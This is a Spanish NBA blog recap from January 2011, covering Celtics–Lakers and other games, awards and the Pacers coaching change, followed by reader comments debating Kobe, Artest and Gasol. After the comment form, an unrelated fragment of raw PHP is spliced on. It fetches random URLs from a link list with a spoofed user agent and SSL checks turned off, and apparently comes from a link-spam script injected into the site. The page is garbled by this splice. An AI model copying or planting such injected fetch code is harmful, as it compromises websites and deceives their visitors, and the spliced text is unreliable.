La Crónica (30/01/2011)

31 de January de 2011 por TheDeerHunter

Día marcado en rojo en los calendarios de la inmensa mayoría de los aficionados a la NBA. Por primera vez desde el séptimo partido de las últimas finales, también en el Staples, se veían las caras los Celtics y los Lakers. Partido a cara de perro por antonomasia en esta competición… al menos, por lo que vimos ayer, para alguno de ellos (109-96). Y es que el partido de anoche tuvo muy poco que ver con aquel que vimos para cerrar el pasado curso. Los Celtics, comandados por un Paul Pierce imparable, anotaron por encima de un 60% y un 50% en triples ante la impotencia o la parsimonia de la defensa amarilla. 13 rebotes de diferencia, nada menos que 24 asistencias… Si el partido duró algo fue por algunas pérdidas de más que regalaron los verdes y por los arreones de talento de Kobe Bryant. No hubo punto de comparación entre unos y otros. Tal y como están las cosas ahora mismo es altamente improbable que la final se repita. Los actuales campeones, como se quejó hace poco Jerry West, tienen pinta de todo menos de estar capacitados para optar al anillo y el tiempo juega en su contra. Cuando el hambre se pierde es muy difícil recuperarlo. Ese es un pecado al que nunca se han permitido caer los Celtics.

Los “chicos de la playa” volvían a jugar juntos en Oklahoma tras unas semanas con problemas físicos. No lo pasaron muy bien. Durant, Westbrook y Jeff Green dejaron claro muy pronto que no era el momento ni el lugar para llegar renqueantes y al final del primer cuarto ya les habían endiñado 38 puntos. Los Heat lograron aguantar el chaparrón y liderados por Wade llegaron a los minutos finales con ventaja. Algunos fallos puntuales, incluída alguna pérdida de más del propio Wade (hasta 9 regaló) parecía que iba a dar al traste con todo el esfuerzo. En ese momento apareció Eddie House con 5 puntos como 5 soles en el momento más adecuado. Los únicos que anotó para amarrar el resultado (108-103).

Por su parte Orlando cumplió el trámite con Cleveland (87-103), pero los Hornets volvieron a meterse en una minicrisis en Phoenix (102-104). Otra vez Gortat demoledor pasándole por encima a Okafor. ¿Porqué sigue siendo titular Robin? (y eso que anoche tampoco lo hizo mal, sin que sirva de precedente)

Para crisis la de los Jazz, que anoche firmaron su 7ª derrota en 10 partidos en el Arena de Oakland (81-96). Deron Willams de baja, para colmo. Ante Earl Watson y con Monta Ellis de día malo, Stephen Curry se puso las botas. Los Knicks, en partido de su vida de Mozgov, le pasaron por encima a los Pistons (106-124). Por su parte los Sixers lograron una victoria importantísima ante Denver (99-110). Con Iguodala y Young destacados, como en los viejos tiempos, y Evan Turner rondando el triple doble. A ver si despierta de una vez.

Para finalizar, confirmar la noticia de la destitución de Jim O’Brien. Muchos esperábamos grandes cosas de él en los Pacers pero el equipo no ha llegado a crecer en ningún momento. Además este curso ha dado la sensación de haber perdido completamente el norte. Su sustituto será Frank Vogel hasta final de temporada.

PREMIOS

MVP: Varios partidos a destacar: Los 33-6-4 de Amare Stoudamire, 23-6-7 de Stephen Curry, 23-4-13 de Lebron James, el 20-20 de Dwight Howard, los 32-5-3 de Paul Pierce… Mucha tela que cortar.

Rookie: Timofey Mozgov se haría con el premio en justa medida pero para no repetir se lo otorgaremos a su rival de anoche, Greg Monroe. Sus 15 puntos y 17 rebotes demuestran que a lo mejor llegaron a un acuerdo para no defenderse.

Sorpresa: Increíble partido del ruso Timofey Mozgov. Se ha pasado casi 3 semanas en el banco sin disputar un solo minuto pero parece que lo ha aprovechado para aprender. Anoche D’Antoni le permitió jugar 40 minutos y él respondió con 23 puntos y 14 rebotes.

Decepción: ¿Dónde quedó el Artest del año pasado? Los Lakers necesitarán mucho más de él si quieren repetir titulo. Con el 1 de 10 de anoche no van a ninguna parte.

Esfuerzo en vano: Kobe Bryant anotó 41 puntos pero su aportación fue prácticamente nula en otros aspectos. ¿Puede este hecho ser en parte causa de la derrota de los Lakers? Los 26 puntos y 12 asistencias de Chris Paul también se quedaron sin premio.

Imágenes | AP Photos/ Getty Images

Comenta

17 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    El problema con Artest no fue el 1 de 10 (que también, claro) sino que apenas fue ni una molestia para Pierce, que le dio un baño tremendo. Estos Lakers, como los Heat, son equipos a los que sólo podremos medir en Playoffs. Eso no quita el hecho de que las sensaciones sea malas y que haya que esperar más de muchos de sus jugadores.

    Ya era hora de que se cargase a Obie, bufffff… A ver si en lo que queda de temporada podemos ver de qué son realmente capaces George, Hibbert, Collison y compañía.

      Citar

  2. Busky23 dice:
    #2

    Mucho han de cambiar las cosas para poder ver a estos Lakers disputar el anillo. 
    Una vez más otro de los favoritos (para mi son los grandes favoritos),llega al Staples y barre de la pista a los amarillos,tremendo partido de Boston superando en todo a su rival.
    Lo de Artest ya es para hacerselo mirar,ya ni siquiera vale para defender,el detalle de Phil de jugar con Fisher y Blake a la vez lo dice todo. Gasol muy flojo,y Bryant…solo contra el mundo (mala señal).
    Por los verdes todo rueda a la perfección,Pierce lidera,Garnett muerde,Rondo parte y reparte y Allen aniquila ( solo le quedan 11 triples).
    Dureza y solidez es lo que me transmite este EQUIPO,todo lo contrario que en L.A.
    Veremos a ver como solucionan la tremenda gira que se les viene encima a los de Phil.

    Saludos.

      Citar

  3. Denise dice:
    #3

    Lo bueno para Lakers es que su problema no es de que los jugadores sean malos, sino de actitud, de cabeza, los dos ultimos anillos han hecho que se relajen (Phil, el primero), y ya veremos que actitud muestran en playoffs, lo que si es verdad es que el factor cancha se le está escapando con todos los favoritos, a los cuales todavía no ha ganado a ninguno.
    Soy detractor de que Kobe o cualquier estrella tire más de 25 tiros por partido, pero ayer estaba justificado, si Kobe no tira y encestado tanto, los Lakers hubiesen perdido de 25.
    Tranquilo angelinos, que seguis teniendo la mejor plantilla, y dentro de un mes volverá Barnes, por lo que Ron Ron espabilará o le harán espabilar (supongo).
    Que verguenza de Cavs, 61 rebotes de Magic por 35 solo de Cavs, Howard cogió 20 rebotes en 26 minutos, imaginad cuantos habría cogido si juega el partido entero. Ya llevan 29 de los ultimos 30 partidos perdidos.
    Creo que VivaDirk de base, DeerHunter de escolta tirador, Sergio de alero fuertote, Busky23 de ala-pivot con clase, y Kantonyo de center con fisico brutal, más Txusma de entrenador y yo de Cheerleader haríamos menos el ridículo que estos Cavs.

      Citar

  4. Rompe dice:
    #4

    “Creo que VivaDirk de base, DeerHunter de escolta tirador, Sergio de alero fuertote, Busky23 de ala-pivot con clase, y Kantonyo de center con fisico brutal, más Txusma de entrenador y yo de Cheerleader haríamos menos el ridículo que estos Cavs.”

    Donde hay que firmar?? xD
    Me apunto para cheerleader!

      Citar

  5. Denise dice:
    #5

    Bien, ya tengo compañero para que sujete mi bello cuerpo mientrás hago una volterete XD……..
    Por cierto, partidazo del polaco Gortat, siempre digo que si cae en el equipo y entrenador adecuado y le mandan algunos balones es un center de 14-12 por noche.
    Y si decide ir al Eurobasket’11 se las vería con España, que ha sido encuadrada en un grupo con Gran Bretaña, Polonia, Turquia, Lituania y algun equipo de cascarilla que viene del PreEuropeo. Si van todos los buenos, buen Europeo, aunque con demasiados partidos en las primeras fases, cuando todos sabemos que las habichuelas se juegan en los cuartos de final.

      Citar

  6. Busky23 dice:
    #6

    Jajaja,eso es un quinteto y no los del All-Star 😉
    Ya dije la semana pasada que la situación actual de los Cavs es lamentable,ahí todo el mundo ha tirado la toalla,empezando por el entrenador. Esta noche se vuelven a cruzar con Lebron,a ver si les da un poco de Karma y revisten un poco la situación .
    Por cierto,un ex-Cav,Mike Brown suena como posible sustituto de O’Brien en Indiana.

      Citar

  7. Busky23 dice:
    #7

    Si tenéis un rato leer la crónica del partido en la web PauGasol.com zurrando a Kobe de lo lindo. Ni doy ni quito razones,que cada uno saque sus propias conclusiones.

      Citar

  8. MagicJohnson32 dice:
    #8

    Denise, por experiencia te recomiendo poner a VivaDirk de 3 y a Txus de 4 😉 Con eso os merendáis a los Cavs fijo!!

      Citar

  9. GreenPride dice:
    #9

    De ayer vi Thunder-Heat y por supuesto Lakers-Celtics.
    Del Thunder-Heat decir que LeBron fue clave en el partido con su defensa en el segundo tiempo sobre Durant y que cuando juegan los 3 del Big Three son un equipo difícil de batir, además Miller se está empezando a poner en forma. Yo creo que dirimiran el título del Este con los Celtics, con permiso de los Bulls que no me gustaría cruzármelos en una eliminatoria de Playoffs. Por los Thunder bien Green y Westbrook y personalmente no entiendo por qué Ibaka jugó sólo 9 minutos de partido. Por los Heat muy buen trabajo de Bosh.
    En “el partido” Lakers-Celtics decir que sin un partido así de Kobe los Lakers habrían perdido de 30 ayer. Los Celtics como casi toda la temporada muy sólidos y con un gran porcentaje de tiros ante la mala defensa de los Lakers. Fenomenal Pierce que se vengó un poco de Artest, gran Kevin Garnett comandando con su defensa sobre Pau y sus rebotes, letal Ray Allen y buen partido de nuevo de Rondo con 16 asistencias y de Big Baby bajo los aros y Nate desde el banco. Lo de los de L.A. muy preocupante, no tanto por el record sino por las sensaciones y porque ahora les empieza su tramo más complicado de la temporada, recibiendo a los Spurs y haciendo luego un viaje de 11 días y 7 partidos por Oeste-Este en el que visitarán New Orleans, Memphis, Boston, Orlando, y New York. Para echarse a temblar como no se pongan las pilas. A primeros de Marzo tendran otra gira en San Antonio, Atlanta, Miami y Dallas así que más vale que se pongan a ello ya.

      Citar

  10. Viva_Dirk dice:
    #10

    Creo que Boston hizo un partidazo, pero muchos de los defectos de ayer son los que se lleva viendo al equipo toda la temporada y nos estan costando demasiadas derrotas. Hay pequeños detalles que no me preocupan en exceso como lo poco que se busca a Bynum, la poca fluidez del juego o las desapariciones de Gasol, esto último sobre todo esta claro que es debido al sobreesfuerzo que tuvo que hacer a principio de temporada y estan bien para que llegue lo mejor posible a play-offs. Pero hay 2 cosas que me preocupan de verdad:

    – La defensa: Especialmente me preocupa la defensa exterior, ya sabemos lo que hay en el puesto de base, ni Blake ni Brown estan mejorando en eso demasiado a Fisher y deberian hacerlo. Los movimientos defensivos son lentos en general y eso permite canastas relativamente cómodas, somo el 5º equipo de la liga que mas asistencias ‘encaja’. Kobe tiene 32 años y evidentemente su preparación va encaminada a play-offs, pero tampoco esta siendo un gran año el suyo a nivel defensivo. Esto no creo que sea facil de cambiar de un dia para otro, o se ponen las pilas ahí o no tenemos nada que hacer.

    – Ron Artest: Se podia esperar cierta relajación después del anillo por su parte y mas en la regular, pero su temporada es terrorífica. Es un lastre absoluto en ataque y no frena a nadie atrás, con este nivel de un tio que juega casi 30 minutos lo tenemos muy jodido. O se le tradea(chungo), o se le endereza hasta fin de año o Barnes/Odom tienen que robarle muchísimos minutos.

      Citar

  11. Denise dice:
    #11

    jaja y tu de sexto hombre magicjohnson:)
    @busky: si es lo que yo he leido tampoco veo que le haya zurrado, dice que el partido fue un Kobe-Celtics y que vuelve a existir la Kobedependencia. Ademas, el articulo no esta escrito por Pau, a no ser que sea tan Dios de hablar en 3º persona “Pau pasó inadvertido, si no fuera porque sin querer le hizo una brecha a Garnett en la cabeza” por ejemplo. A lo mejor me he equivocado de articulo…

      Citar

  12. Busky23 dice:
    #12

    Esta claro que las crónicas no las escribe Gasol pero resulta curioso que siendo SU página web oficial se escriban frases como “Desde que en el segundo cuarto consiguiera 17 puntos, Bryant decidió que él podía ganar el partido, primero compitiendo contra Pierce, y luego contra todos los jugadores de Boston”

    “Es verdad que Gasol no está en un momento espléndido, pero tiene suficiente nivel como para ayudar a Kobe a sumar victorias y a luchar contra los mejores”

    “después de 29 tiros, de los que metió 16. No perdió el partido, pero no dio opciones a que los demás le ayudaran a ganarlo”
    Eso yo lo entiendo como una critica hacia Kobe y su actitud especialmente en el ultimo cuarto.

      Citar

  13. TheDeerHunter dice:
    #13

    Yo de escolta tirador??… Denise. Mal nos iría. Base y no especialmente buen tirador.

    Si a Gasol a quien admiro por encima de todas las cosas se le ocurriera ser más Kobe de vez en cuando otro gallo nos cantaría. Si Kobe no se hubier empeñado ayer en competir primero “contra Pierce, y luego contra todos los jugadores de Boston” no nos hubieran metido 30 de diferencia sino 40.

    Si Pau no tolerase en su puñetera vida lo que ayer no le hacía mover una ceja hubiera ha sido aún mucho más grande de lo que ha sido. Ningún jugador que viste la camiseta de los Lakers debería jamás salir con la actitud de anoche contra los Celtics, más allá de que anoche lo tenían crudo.

      Citar

  14. Denise dice:
    #14

      Citar

  15. Denise dice:
    #15

    Base y especiamente no tirador?? Entonces Deerhunter, eres un base tipo Nate McMillan ? Ahh ya sé por qué te gusta tanto el bueno de Nate, te miras en el espejo y te ves reflejado en él;)

      Citar

  16. TheDeerHunter dice:
    #16

    jojojo, qué mala leche

    Como jugador no le tengo ninguna manía a McMillan. Al contrario más bien.

      Citar

  17. scriers dice:
    #17

    Oye, ¿Es posible que se eche alguna vez una pachanguita?

    En otro orden de cosas, ¿Qué le pasa a Pau? Vaya actitud la de los Lakers, que estiran el chicle de la desidia hasta el límite. Se parece al último Barça de Rijkaard. Les falta un efecto Ariza.

    Y Boston son, a día de hoy, el equipo que más temería para irme a una ronda de Playoff. Doc Rivers cada vez me parece mejor entrenador.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>